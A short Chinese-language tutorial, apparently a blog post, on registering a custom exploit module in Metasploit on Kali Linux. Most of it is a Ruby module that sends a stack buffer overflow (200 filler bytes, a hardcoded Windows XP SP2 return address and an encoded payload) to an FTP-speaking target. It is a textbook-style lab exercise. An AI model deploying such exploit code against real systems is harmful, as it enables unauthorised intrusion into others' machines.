給kali的metasploit下新增一個新的exploit
- 首先在/usr/share/metasploit-framework/modules/exploits/目錄下新建一個自定義資料夾,例如fwdtest
- 仿造exploits目錄下的其他exp(rb檔案)編寫自己的exp.rb指令碼(這邊用0day安全:軟體漏洞分析技術裡的一個栗子)
-
[email protected]:/usr/share/metasploit-framework/modules/exploits/fwdtest# ls
-
0day1.rb
-
[email protected]:/usr/share/metasploit-framework/modules/exploits/fwdtest# cat 0day1.rb
-
##
-
# This module requires Metasploit: http//metasploit.com/download
-
# Current source: https://github.com/rapid7/metasploit-framework
-
##
-
require 'msf/core'
-
class Metasploit3 < Msf::Exploit::Remote
-
include Msf::Exploit::Remote::Ftp
-
def initialize(info = {})
-
super(update_info(info,
-
'Name' => 'security test',
-
'Description' => %q{
-
This module exploits a buffer overflow.
-
},
-
'Author' => 'fwd',
-
'License' => MSF_LICENSE,
-
'Privileged' => true,
-
'Payload' =>
-
{
-
'Space' => 300,
-
'BadChars' => "\x00",
-
},
-
'Platform' => 'win',
-
'Targets' =>
-
[
-
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x7c809f83 } ],
-
]))
-
end
-
def exploit
-
connect
-
attack_buf = 'a'*200
-
attack_buf += [target.ret].pack('V')
-
attack_buf += payload.encoded
-
sock.put(attack_buf)
-
handler
-
disconnect
-
end
-
end
-
[email protected]:/usr/share/metasploit-framework/modules/exploits/fwdtest#
- 在控制檯下啟動metasploit
- 在msf提示符下輸入reload_all重新載入所有模組
- 在msf提示符下輸入use exploit/fwdtest/exp(輸入的時候可以用tab補全,如果不能補全說明就有問題)